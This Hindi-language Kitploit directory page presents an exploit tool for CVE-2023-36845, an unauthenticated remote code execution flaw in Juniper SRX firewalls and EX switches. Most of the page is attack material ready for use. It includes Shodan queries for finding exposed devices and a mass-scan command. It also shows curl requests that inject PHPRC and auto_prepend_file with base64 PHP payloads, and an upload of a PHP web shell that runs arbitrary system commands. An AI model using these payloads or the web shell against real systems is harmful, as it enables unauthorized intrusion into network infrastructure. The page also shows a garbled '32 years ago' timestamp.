Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Juniper-exploit-CVE-2023-36845 — CVE-2023-36845 के लिए एक्सप्लॉइट, Juniper SRX/EX में PHP पर्यावरण चर हेरफेर भेद्यता, क्राफ्टेड HTTP अनुरोधों के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/charondefalt/juniper-exploit-cve-2023-36845
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubcharondefalt/juniper-exploit-cve-2023-36845

Juniper-exploit-CVE-2023-36845

CVE-2023-36845 के लिए एक्सप्लॉइट, Juniper SRX/EX में PHP पर्यावरण चर हेरफेर भेद्यता, क्राफ्टेड HTTP अनुरोधों के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन सक्षम करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
32 साल पहलेअभी तक समीक्षित नहीं

CVE-2023-36845

विवरण

CVE-2023-36845 एक महत्वपूर्ण PHP पर्यावरण चर हेरफेर भेद्यता है जो Juniper SRX फायरवॉल और EX स्विच को प्रभावित करती है। जबकि Juniper ने इस भेद्यता को मध्यम गंभीरता की श्रेणी में रखा है, इस लेख में हम यह समझाएँगे कि इस एकल भेद्यता का उपयोग दूरस्थ, अप्रमाणित कोड निष्पादन के लिए कैसे किया जा सकता है।

खोज - Shodan

root@kitploit:~
title:"Juniper Web Device Manager"
छवि
root@kitploit:~
title:"Juniper" http.favicon.hash:2141724739
छवि

उपयोग 🛠

पता लगाना

root@kitploit:~
python3 CVE-2023-36845.py -f targets.txt -o output.txt

RCE 🧨

विकल्प 1

auto_prepend_file के साथ किसी भी प्रोटोकॉल रैपर का उपयोग करना संभव है। इस ऑपरेशन के लिए सबसे उपयुक्त विकल्प data:// प्रोटोकॉल है, जो "द्वितीयक फ़ाइल" को इनलाइन प्रदान करने की अनुमति देता है। यहाँ इस एक्सप्लॉइट का एक उन्नत प्रतिनिधित्व है, जो data:// स्कीम के भीतर एम्बेडेड <? phpinfo(); ?> को निष्पादित करता है:

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

whoami कमांड निष्पादित करें

<?php shell_exec('whoami'); ?>

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'

विकल्प 2

फ़ाइल अपलोड करें

<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>

root@kitploit:~
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'

पैरामीटर 🧰

पैरामीटरविवरणप्रकार
--file / -fइनपुट लक्ष्य फ़ाइलफ़ाइल
-oआउटपुट फ़ाइलफ़ाइल
टूल डाउनलोड करें